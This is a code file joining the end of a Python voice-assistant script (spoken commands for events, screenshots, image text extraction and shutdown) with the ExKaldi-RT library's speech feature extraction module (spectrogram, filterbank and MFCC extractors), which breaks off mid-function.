"event" in cmd: text_to_speech.sayAndWait("Just wait Please") thread = threading.Thread(target=Return_events_info.say_event_details, args=("how many events do i have today",)) thread.start() if "turn off computer" in cmd or "switch off" in cmd: os.system("shutdown /s /t 1") if 'fetch text from an image' in cmd or 'fetch text from image' in cmd or "get text from an image" in cmd or "get text from image" in cmd \ or 'text from image' in cmd or 'text from an image' in cmd: thread = threading.Thread(target=fetch_text_image.fetch_text_from_image) thread.start() if "take a screen shot" in cmd or "take screen shot" in cmd or "take a screenshot" in cmd or "take screenshot" in cmd: import getpass username = getpass.getuser().strip() pyautogui.screenshot(f"C://users//{username}//Desktop//{str(datetime.datetime.now()).replace(':','-')}.jpg") from pynput import keyboard from plyer import notification def on_press(i): # print(i) # print(dir(i)) # print(str(type(i)) == "<enum 'Key'>") if str(type(i)) == "<enum 'Key'>" and i.name == "esc": with microphone as mic: print("You can speak now, we are listening in background") print("🚩 " * 36) notification.notify("Listening ...", "You can speak now ...", timeout=1, toast=True) try: audio = recognizer.listen(mic, phrase_time_limit=5, timeout=4) text = recognizer.recognize_google(audio) print("CMD: " + text) notification.notify("Command: ", text, timeout=2.2) thread = threading.Thread(target=run_cmd, args=(text,)) thread.start() except sr.WaitTimeoutError as e: print(e) except sr.UnknownValueError as e: print("*" * 50) print("can not recognize") print(e) print("*" * 50) except sr.RequestError as e: text_to_speech.sayAndWait("Problem in Internet Connection") except socket.timeout as e: text_to_speech.sayAndWait("Slow Internet Connection") print(e) except Exception as e: print(e) notification.notify("Free 🆓", "Waiting ...", timeout=1, toast=True) text_to_speech.sayAndWait("Hello Sir! I am Your Virtual Assistant") thread = threading.Thread(target=Send_Achinya_started_email.send_stated_email) thread.start() with keyboard.Listener(on_press=on_press) as listener: listener.join()
feature.py
# coding=utf-8 # # Yu Wang (University of Yamanashi) # Apr, 2021 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import math import pyaudio import wave import time import webrtcvad import threading import multiprocessing import numpy as np import subprocess from collections import namedtuple from exkaldirt.base import ExKaldiRTBase, Component, PIPE, Packet, ContextManager from exkaldirt.utils import run_exkaldi_shell_command, encode_vector_temp from exkaldirt.base import info, mark, print_ from exkaldirt.base import Endpoint, is_endpoint, NullPIPE # from base import ExKaldiRTBase, Component, PIPE, Packet, ContextManager # from utils import run_exkaldi_shell_command, encode_vector_temp # from base import info, mark, print_ # from base import Endpoint, is_endpoint, NullPIPE if info.CMDROOT is None: raise Exception("ExKaldi-RT C++ library have not been compiled sucessfully. " + \ "Please consult the Installation in github: https://github.com/wangyu09/exkaldi-rt .") import sys sys.path.append( info.CMDROOT ) import cutils ############################################### # 1. Some functions for feature extraction ############################################### def pre_emphasize_1d(waveform,coeff=0.95): ''' Pre-emphasize the waveform. Args: _waveform_: (1-d np.ndarray) The waveform data. _coeff_: (float) Coefficient. 0 <= coeff < 1.0. Return: A new 1-d np.ndarray. ''' assert 0 <= coeff < 1.0 assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 new = np.zeros_like(waveform) new[1:] = waveform[1:] - coeff*waveform[:-1] new[0] = waveform[0] - coeff*waveform[0] return new def pre_emphasize_2d(waveform,coeff=0.95): ''' Pre-emphasize the waveform. Args: _waveform_: (2-d np.ndarray) A batch of waveform data. _coeff_: (float) Coefficient. 0 <= coeff < 1.0. Return: A new 2-d np.ndarray. ''' assert 0 <= coeff < 1.0 assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 new = np.zeros_like(waveform) new[:,1:] = waveform[:,1:] - coeff*waveform[:,:-1] new[:,0] = waveform[:,0] - coeff*waveform[:,0] return new def get_window_function(size,winType="povey",blackmanCoeff=0.42): ''' Get a window. Args: _size_: (int) The width of window. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". Return: A 1-d np.ndarray. ''' assert isinstance(size,int) and size > 0 window = np.zeros([size,],dtype="float32") a = 2*np.pi / (size-1) for i in range(size): if winType == "hanning": window[i] = 0.5 - 0.5*np.cos(a*i) elif winType == "sine": window[i] = np.sin(0.5*a*i) elif winType == "hamming": window[i] = 0.54 - 0.46*np.cos(a*i) elif winType == "povey": window[i] = (0.5-0.5*np.cos(a*i))**0.85 elif winType == "rectangular": winType[i] = 1.0 elif winType == "blackman": assert isinstance(blackmanCoeff,float) winType[i] = blackmanCoeff - 0.5*np.cos(a*i) + (0.5-blackmanCoeff)*np.cos(2*a*i) else: raise Exception(f"Unknown Window Type: {winType}") return window def dither_singal_1d(waveform,factor=1.0): ''' Dither the signal. Args: _waveform_: (1-d np.ndarray) The waveform. _factor_: (float) Dither factor. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return cutils.dither( waveform[None,:], factor)[0] def dither_singal_2d(waveform,factor=0.0): ''' Dither the signal. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. _factor_: (float) Dither factor. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 return cutils.dither(waveform, factor) def remove_dc_offset_1d(waveform): ''' Remove the direct current offset. Args: _waveform_: (1-d np.ndarray) The waveform. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return waveform - np.mean(waveform) def remove_dc_offset_2d(waveform): ''' Remove the direct current offset. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 return waveform - np.mean(waveform,axis=1,keepdims=True) def compute_log_energy_1d(waveform,floor=info.EPSILON): ''' Compute log energy. Args: _waveform_: (1-d np.ndarray) The waveform. _floor_: (float) Float floor value. Return: A new 1-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 return np.log(max(np.sum(waveform**2),floor)) def compute_log_energy_2d(waveform,floor=info.EPSILON): ''' Compute log energy. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. _floor_: (float) Float floor value. Return: A new 2-d np.ndarray. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 temp = np.sum(waveform**2,axis=1) temp[temp < floor] = floor return np.log(temp) def split_radix_real_fft_1d(waveform): ''' Compute split radix FFT. Args: _waveform_: (1-d np.ndarray) The waveform. Return: A tuple: (FFT length, Result ). _FFT length_: (int). _Result_: (A 2-d np.ndarray) The first dimension is real values, The second dimension is image values. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 1 points = len(waveform) fftLen = get_padded_fft_length(points) result = cutils.srfft(waveform[None,:],fftLen)[0] return fftLen, result def split_radix_real_fft_2d(waveform): ''' Compute split radix FFT. Args: _waveform_: (2-d np.ndarray) A batch of waveforms. Return: A tuple: ( FFT length, Result ). _FFT length_: (int). _Result_: (A 3-d np.ndarray) The 2st dimension is real values, The 3st dimension is image values. ''' assert isinstance(waveform,np.ndarray) and len(waveform.shape) == 2 points = waveform.shape[1] fftLen = get_padded_fft_length(points) result = cutils.srfft(waveform,fftLen) return fftLen, result def compute_power_spectrum_1d(fftFrame): ''' Compute power spectrum. Args: _fftFrame_: (2-d np.ndarray) A frame of FFT result. Return: A 1-d np.ndarray. ''' assert isinstance(fftFrame,np.ndarray) and len(fftFrame.shape) == 2 zeroth = fftFrame[0,0] + fftFrame[0,1] n2th = fftFrame[0,0] - fftFrame[0,1] fftFrame = np.sum(fftFrame**2,axis=1) fftFrame[0] = zeroth**2 return np.append(fftFrame,n2th**2) def compute_power_spectrum_2d(fftFrame): ''' Compute power spectrum. Args: _fftFrame_: (2-d np.ndarray) A batch of frames. FFT results. Return: A 2-d np.ndarray. ''' assert isinstance(fftFrame,np.ndarray) and len(fftFrame.shape) == 3 zeroth = fftFrame[:,0,0] + fftFrame[:,0,1] n2th = fftFrame[:,0,0] - fftFrame[:,0,1] fftFrame = np.sum(fftFrame**2,axis=2) fftFrame[:,0] = zeroth**2 return np.append(fftFrame,(n2th**2)[:,None],axis=1) def apply_floor(feature,floor=info.EPSILON): ''' Apply float floor to feature. Args: _feature_: (np.ndarray) Feature. _floor_: (float) Float floor value. Return: A 2-d np.ndarray (Not new). ''' feature[feature<floor] = floor return feature def mel_scale(freq): ''' Do Mel scale. Args: _freq_: (int) Frequency. Return: A float value. ''' return 1127.0 * np.log (1.0 + freq / 700.0) def inverse_mel_scale(melFreq): ''' Do Inverse Mel scale. Args: _freq_: (int) Frequency. Return: A float value. ''' return 700.0 * (np.exp(melFreq/1127.0) - 1) def get_mel_bins(numBins,rate,fftLen,lowFreq=20,highFreq=0): ''' Get the Mel filters bank. Args: _numBins_: (int) The number of filters. _rate_: (int) Sampling rate. _fftLen_: (int) FFT length. _lowFreq_: (int) The minimum frequency. _highFreq_: (int) The maximum frequency. If zero, highFreq = rate/2. If < 0, highFreq = rate/2 - highFreq. Return: A 2-d np.ndarray with shape ( fftLen/2, numBins ). ''' assert isinstance(numBins,int) and numBins >= 0 assert isinstance(rate,int) and rate >= 2 assert isinstance(fftLen,int) and fftLen > 0 and int(np.log2(fftLen)) == np.log2(fftLen) assert isinstance(lowFreq,int) and lowFreq >= 0 assert isinstance(highFreq,int) nyquist = int(0.5 * rate) numFftBins = fftLen//2 if highFreq <= 0: highFreq = nyquist + highFreq fftBinWidth = rate/fftLen melLow = mel_scale(lowFreq) melHigh = mel_scale(highFreq) delDelta = (melHigh-melLow)/(numBins+1) result = np.zeros([numBins,numFftBins+1],dtype="float32") for binIndex in range(numBins): leftMel = melLow + binIndex * delDelta centerMel = melLow + (binIndex+1) * delDelta rightMel = melLow + (binIndex+2) * delDelta for i in range(numFftBins): freq = fftBinWidth * i mel = mel_scale(freq) if leftMel < mel < rightMel: if mel <= centerMel: weight = (mel - leftMel)/(centerMel - leftMel) else: weight = (rightMel - mel)/(rightMel - centerMel) result[binIndex,i] = weight return result.T def get_padded_fft_length(points): ''' Compute FFT length. Args: _points_: (int) Frame width. Return: An int value. ''' assert isinstance(points,int) and points >= 2 fftLen = 1 while fftLen < points: fftLen <<= 1 return fftLen def get_dct_matrix(numCeps,numBins): ''' Compute DCT matrix. Args: _numCeps_: (int) The dim. of MFCC. _numBins_: (int) The dim. of fBank. Return: An 2-d np.ndarray with shape: (numBins, numCeps) ''' assert isinstance(numCeps,int) and numCeps > 0 assert isinstance(numBins,int) and numBins > 0 result = np.zeros([numCeps,numBins],dtype="float32") result[0] = np.sqrt(1/numBins) normalizer = np.sqrt(2/numBins) for i in range(1,numCeps): for j in range(0,numBins): result[i,j] = normalizer * np.cos( np.pi/numBins*(j+0.5)*i ) return result.T def get_cepstral_lifter_coeff(dim,factor=22): ''' Compute cepstral lifter coefficient. Args: _dim_: (int) The dim. of MFCC. _factor_: (int) Factor. Return: A 1-d np.ndarray. ''' assert isinstance(dim,int) and dim > 0 assert factor > 0 result = np.zeros([dim,],dtype="float32") for i in range(dim): result[i] = 1.0 + 0.5*factor*np.sin(np.pi*i/factor) return result def add_deltas(feat, order=2, window=2): ''' Append delta feature. Args: _feat_: (2-d np.ndarray) Feature with shape (frames, dim). _order_: (int). _window_: (int). Return: An new 2-d np.ndarray with shape: (frames, dim * (order+1)). ''' assert isinstance(feat,np.ndarray) and len(feat.shape) == 2 assert isinstance(order,int) and order > 0 assert isinstance(window,int) and window > 0 # return cutils.add_deltas(feat,order,window) frames = feat.shape[0] dims = feat.shape[1] inputs = f"{frames} {dims} ".encode() + encode_vector_temp( feat.reshape(-1) ) cmd = os.path.join(info.CMDROOT,f"exkaldi-add-deltas --order {order} --window {window}") out = run_exkaldi_shell_command(cmd,inputs=inputs) return np.array(out,dtype="float32").reshape([frames,-1]) def splice_feats(feat, left, right): ''' Splice the left and right context of feature. Args: _feat_: (2-d np.ndarray) Feature with shape (frames, dim). _left_: (int). _right_: (int). Return: An new 2-d np.ndarray with shape: (frames, dim * (left+right+1)). ''' assert isinstance(feat,np.ndarray) and len(feat.shape) == 2 assert isinstance(left,int) and left >= 0 assert isinstance(right,int) and right >= 0 if left == 0 and right ==0: return feat return cutils.splice_feat(feat, left, right) # This function is wrapped from kaldi_io library. def load_lda_matrix(ldaFile): ''' Read the LDA(+MLLT) matrix from Kaldi file. Args: _ldaFile_: (str) LDA matrix file path. ''' assert os.path.isfile(ldaFile), f"No such file: {ldaFile}." with open(ldaFile,"rb") as fd: binary = fd.read(2).decode() assert binary == '\0B' header = fd.read(3).decode() if header == 'FM ': sample_size = 4 elif header == 'DM ': sample_size = 8 else: raise Exception("Only FM -> float32 or DM -> float64 can be used.") s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0] buf = fd.read(rows * cols * sample_size) if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32') else: vec = np.frombuffer(buf, dtype='float64') return np.reshape(vec,(rows,cols)).T class MatrixFeatureExtractor(Component): ''' The base class of a feature extractor. Please implement the self.extract_function by your function. ''' def __init__(self,extFunc,minParallelSize=10,oKey="data",name=None): ''' Args: _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two parallel threads for one batch features. _name_: (str) Name. ''' super().__init__(oKey=oKey,name=name) assert isinstance(minParallelSize,int) and minParallelSize >= 2 assert callable(extFunc) self.__extract_function_ = extFunc self.__minParallelBatchSize = minParallelSize//2 def core_loop(self): self.__firstStep = True while True: action = self.decide_action() self.__featureCache = [[],[]] if action is True: packet = self.get_packet() if not packet.is_empty(): iKey = packet.mainKey if self.iKey is None else self.iKey mat = packet[ iKey ] assert isinstance(mat, np.ndarray) and len(mat.shape) == 2 bsize = len(mat) if self.__firstStep or len(mat) < self.__minParallelBatchSize: newMat = self.__extract_function_( mat ) if isinstance(newMat,np.ndarray): newMat = [newMat,] else: assert isinstance(newMat,(tuple,list)) else: mid = bsize // 2 ### open thread 1 to compute first half part thread1 = threading.Thread(target=self.__extract_parallel,args=(mat[0:mid],0,)) thread1.setDaemon(True) thread1.start() ### open thread 2 to compute second half part thread2 = threading.Thread(target=self.__extract_parallel,args=(mat[mid:],1,)) thread2.setDaemon(True) thread2.start() thread1.join() thread2.join() if None in self.__featureCache: raise Exception("Extraction functions had errors.") ### Concat newMat = [] for i in range( len(self.__featureCache[0]) ): newMat.append( np.concatenate( [self.__featureCache[0][i],self.__featureCache[1][i]],axis=0) ) if self.__firstStep: for mat in newMat: assert (isinstance(mat,np.ndarray) and len(mat.shape) == 2) ,\ "The output of feature function must be a ( 1d -> 1 frame or 2d -> N frames) Numpy array." if mat.shape[0] != bsize: print(f"{self.name}: Warning! The frames of features is lost.") self.__firstStep = False ## Append feature into PIPE if necessary. for i,mat in enumerate(newMat): packet.add(key=self.oKey[i],data=mat,asMainKey=True) self.put_packet( packet ) else: break def __extract_parallel(self,featChunk,ID): ''' A thread function to compute feature. ''' try: outs = self.__extract_function_(featChunk) except Exception as e: self.__featureCache[ID] = None raise e else: if isinstance(outs,np.ndarray): outs = [outs,] else: assert isinstance(outs,(tuple,list)) self.__featureCache[ID] = outs class SpectrogramExtractor(MatrixFeatureExtractor): ''' Spectrogram feature extractor. ''' def __init__(self,energyFloor=0.0,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,minParallelSize=10, oKey="data",name=None): ''' Args: _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _energyFloor_: (float) The energy floor value. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. _blackmanCoeff_: (float) Blackman window coefficient. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. ''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(rawEnergy,bool) assert isinstance(dither,float) and dither >= 0.0 assert isinstance(removeDC,bool) assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither_factor = dither self.__winInfo = (winType, blackmanCoeff) self.__window = None def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) if self.__dither_factor != 0: frames = dither_singal_2d(frames, self.__dither_factor) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff > 0: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) frames = apply_floor(frames) frames = np.log(frames) if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames[:,0] = energies return frames class FbankExtractor(MatrixFeatureExtractor): ''' FBank feature extractor. ''' def __init__(self,rate=16000, energyFloor=0.0,useEnergy=False,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,usePower=True, numBins=23,lowFreq=20,highFreq=0,useLog=True, minParallelSize=10, oKey="data",name=None): ''' Args: _rate_: (int) Sampling rate. _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _energyFloor_: (float) The energy floor value. _useEnergy_: (bool) If True, Add energy dim. to the final fBank feature. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. _blackmanCoeff_: (float) Blackman window coefficient. _usePower_: (bool) If True, use power spectrogram. _numBins_: (int) The dim. of fBank feature. _lowFreq_: (int) The minimum frequency. _lowFreq_: (int) The maximum frequency. _useLog_: (bool) If True, compute log fBank. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. ''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(rate,int) and rate > 0 assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(useEnergy,bool) assert isinstance(rawEnergy,bool) assert isinstance(dither,float) and dither >= 0.0 assert isinstance(removeDC,bool) assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 assert isinstance(usePower,bool) assert isinstance(useLog,bool) self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__add_energy = useEnergy self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither = dither self.__usePower = usePower self.__useLog = useLog self.__winInfo = (winType, blackmanCoeff) self.__window = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) if self.__dither != 0: frames = dither_singal_2d(frames, self.__dither) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__add_energy and self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if self.__add_energy and not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) if not self.__usePower: frames = frames**0.5 frames = np.dot( frames, self.__melFilters ) if self.__useLog: frames = apply_floor(frames) frames = np.log(frames) if self.__add_energy: if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames = np.concatenate([energies[:,None],frames],axis=1) return frames class MfccExtractor(MatrixFeatureExtractor): ''' MFCC feature extractor. ''' def __init__(self,rate=16000, energyFloor=0.0,useEnergy=True,rawEnergy=True,winType="povey", dither=1.0,removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42, numBins=23,lowFreq=20,highFreq=0,useLog=True, cepstralLifter=22,numCeps=13, minParallelSize=10, oKey="data",name=None): ''' Args: _rate_: (int) Sampling rate. _frameDim_: (int) The dim. of frame. _batchSize_: (int) Batch size. _energyFloor_: (float) The energy floor value. _useEnergy_: (bool) If True, Replace the first dim. of feature with energy. _rawEnergy_: (bool) If True, compute energy from raw waveform. _winType_: (str) Window type. "hanning", "sine", "hamming", "povey", "rectangular" or "blackman". _dither_: (float) Dither factor. _removeDC_: (bool) If True remove DC offset. _preemphCoeff_: (float) Pre-emphasize factor. _blackmanCoeff_: (float) Blackman window coefficient. _numBins_: (int) The dim. of fBank feature. _lowFreq_: (int) The minimum frequency. _lowFreq_: (int) The maximum frequency. _useLog_: (bool) If True, compute log fBank. _cepstralLifter_: (int) MFCC lifter factor. _numCeps_: (int) The dim. of MFCC feature. _minParallelSize_: (int) If _batchSize_ >= minParallelSize, run two threads to extract feature. _name_: (str) None. ''' super().__init__(extFunc=self.__extract_function,minParallelSize=minParallelSize,oKey=oKey,name=name) assert isinstance(rate,int) assert isinstance(energyFloor,float) and energyFloor >= 0.0 assert isinstance(dither,float) and dither >= 0.0 assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 assert isinstance(cepstralLifter,int) and numBins >= 0 assert isinstance(numCeps,int) and 0 < numCeps <= numBins assert isinstance(useEnergy,bool) assert isinstance(rawEnergy,bool) assert isinstance(removeDC,bool) assert isinstance(useLog,bool) self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 self.__use_energy = useEnergy self.__need_raw_energy = rawEnergy self.__remove_dc_offset = removeDC self.__preemph_coeff = preemphCoeff self.__dither = dither self.__useLog = useLog self.__winInfo = (winType, blackmanCoeff) self.__window = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None self.__dctMat = get_dct_matrix(numCeps=numCeps,numBins=numBins) if cepstralLifter > 0: self.__cepsCoeff = get_cepstral_lifter_coeff(dim=numCeps,factor=cepstralLifter) else: self.__cepsCoeff = 1 def __extract_function(self,frames): if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) if self.__dither != 0: frames = dither_singal_2d(frames, self.__dither) if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) if self.__use_energy and self.__need_raw_energy: energies = compute_log_energy_2d(frames) if self.__preemph_coeff: frames = pre_emphasize_2d(frames, self.__preemph_coeff) frames *= self.__window if self.__use_energy and not self.__need_raw_energy: energies = compute_log_energy_2d(frames) _, frames = split_radix_real_fft_2d(frames) frames = compute_power_spectrum_2d(frames) frames = np.dot( frames, self.__melFilters ) frames = apply_floor(frames) frames = np.log(frames) frames = frames.dot(self.__dctMat) frames = frames * self.__cepsCoeff if self.__use_energy: if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor frames[:,0] = energies return frames class MixtureExtractor(MatrixFeatureExtractor): ''' Mixture feature extractor. You can extract Mixture of "spectrogram", "fbank" and "mfcc" in the same time. ''' def __init__(self, mixType=["mfcc","fbank"], rate=16000,dither=0.0,rawEnergy=True,winType="povey", removeDC=True,preemphCoeff=0.97, blackmanCoeff=0.42,energyFloor=0.0, numBins=23,lowFreq=20,highFreq=0, useEnergyForFbank=True, usePowerForFbank=True, useLogForFbank=True, useEnergyForMfcc=True, cepstralLifter=22,numCeps=13, minParallelSize=10,oKeys=None,name=None): # Check the mixture type assert isinstance(mixType,(list,tuple)), f"{self.name}: <mixType> should be a list or tuple." for featType in mixType: assert featType in ["mfcc","fbank","spectrogram"], f'{self.name}: <mixType> should be "mfcc","fbank","spectrogram".' assert len(mixType) == len(set(mixType)) and len(mixType) > 1 self.__mixType = mixType if oKeys is None: oKeys = mixType else: assert isinstance(oKeys,(tuple,list)) and len(oKeys) == len(mixType) super().__init__(extFunc=self.__extract_function, minParallelSize=minParallelSize,oKey=oKeys,name=name) # Some parameters for basic computing assert isinstance(rate,int) assert isinstance(dither,float) and dither >= 0.0 self.__dither_factor = dither assert isinstance(removeDC,bool) self.__remove_dc_offset = removeDC assert isinstance(rawEnergy,bool) self.__need_raw_energy = rawEnergy assert isinstance(preemphCoeff,float) and 0 <= energyFloor <= 1 self.__preemph_coeff = preemphCoeff assert isinstance(blackmanCoeff,float) and 0 < blackmanCoeff < 0.5 self.__winInfo = (winType,blackmanCoeff) self.__window = None assert isinstance(energyFloor,float) and energyFloor >= 0.0 self.__energy_floor = np.log(energyFloor) if energyFloor > 0 else 0 #???? # Some parameters for fbank assert isinstance(numBins,int) and numBins >= 3 assert isinstance(lowFreq,int) and isinstance(highFreq,int) and lowFreq >= 0 if highFreq != 0 : assert highFreq > lowFreq self.__fftLen = None self.__melInfo = (numBins,rate,lowFreq,highFreq) self.__melFilters = None assert isinstance(useEnergyForFbank,bool) self.__use_energy_fbank = useEnergyForFbank assert isinstance(useLogForFbank,bool) self.__use_log_fbank = useLogForFbank assert isinstance(usePowerForFbank,bool) self.__use_power_fbank = usePowerForFbank # Some parameters for mfcc assert isinstance(cepstralLifter,int) and numBins >= 0 assert isinstance(numCeps,int) and 0 < numCeps <= numBins assert isinstance(useEnergyForMfcc,bool) self.__use_energy_mfcc = useEnergyForMfcc self.__dctMat = get_dct_matrix(numCeps=numCeps,numBins=numBins) if cepstralLifter > 0: self.__cepsCoeff = get_cepstral_lifter_coeff(dim=numCeps,factor=cepstralLifter) else: self.__cepsCoeff = 1 def __extract_function(self,frames): #print( self.__mixType, self.oKey ) if self.__window is None: frameDim = frames.shape[1] self.__window = get_window_function(frameDim, self.__winInfo[0], self.__winInfo[1], ) fftLen = get_padded_fft_length(frameDim) self.__melFilters = get_mel_bins(self.__melInfo[0], self.__melInfo[1], fftLen, self.__melInfo[2], self.__melInfo[3], ) # Dither singal if self.__dither_factor != 0: frames = dither_singal_2d(frames, self.__dither_factor) # Remove dc offset if self.__remove_dc_offset: frames = remove_dc_offset_2d(frames) # Compute raw energy if self.__need_raw_energy: energies = compute_log_energy_2d(frames) # Pre-emphasize if self.__preemph_coeff > 0: frames = pre_emphasize_2d(frames, self.__preemph_coeff) # Add window frames *= self.__window # Compute energy if not self.__need_raw_energy: energies = compute_log_energy_2d(frames) # Apply energy floor if self.__energy_floor != 0: energies[ energies < self.__energy_floor ] = self.__energy_floor # FFT _, frames = split_radix_real_fft_2d(frames) # Power spectrogram frames = compute_power_spectrum_2d(frames) outFeats = {} # Compute the spectrogram feature if "spectrogram" in self.__mixType: specFrames = frames.copy() specFrames = apply_floor( specFrames ) specFrames = np.log( specFrames ) specFrames[:,0] = energies outFeats[ self.oKey[ self.__mixType.index("spectrogram") ] ] = specFrames # Compute the fbank feature if "fbank" in self.__mixType: fbankFrames = frames.copy() if not self.__use_power_fbank: fbankFrames = fbankFrames**0.5 fbankFrames = np.dot( fbankFrames, self.__melFilters ) if self.__use_log_fbank: fbankFrames = apply_floor(fbankFrames) fbankFrames = np.log(fbankFrames) if self.__use_energy_fbank: fbankFrames = np.concatenate([energies[:,None],fbankFrames],axis=1) outFeats[ self.oKey[ self.__mixType.index("fbank") ] ] = fbankFrames # Compute the mfcc feature if "mfcc" in self.__mixType: mfccFeats = frames mfccFeats = np.dot( mfccFeats, self.__melFilters ) mfccFeats = apply_floor( mfccFeats ) mfccFeats = np.log( mfccFeats ) mfccFeats = mfccFeats.dot( self.__dctMat ) mfccFeats = mfccFeats * self.__cepsCoeff if self.__use_energy_mfcc: mfccFeats[:,0] = energies outFeats[ self.oKey[ self.__mixType.index("mfcc") ] ] = mfccFeats return tuple( outFeats[oKey] for oKey in self.oKey ) ############################################### # 2. Some functions for Online CMVN ############################################### def compute_spk_stats(feats): ''' Compute the statistics from speaker utterances. Args: _feats_: (2-d array, list or tuple) All utterances of a speaker. Return: A 2-d array with shape (2, feat dim + 1) ''' if not isinstance(feats,(list,tuple)): feats = [feats,] dim = None stats = None for feat in feats: assert isinstance(feat,np.ndarray) and len(feat.shape) == 2, "<feats> should be 2-d NumPy array." if dim is None: dim = feat.shape[1] stats = np.zeros([2,dim+1],dtype=feat.dtype) else: assert dim == feat.shape[1], "Feature dims do not match!" stats[0,0:dim] += np.sum(feat,axis=0) stats[1,0:dim] += np.sum(feat**2,axis=0) stats[0,dim] += len(feat) return stats def get_kaldi_cmvn(fileName,spk=None): ''' get the global(or speaker) CMVN from Kaldi cmvn statistics file. Args: _fileName_: (str) Kaldi cmvn .ark file. _spk_: (str) Speaker ID. Return: A 2-d array. ''' assert 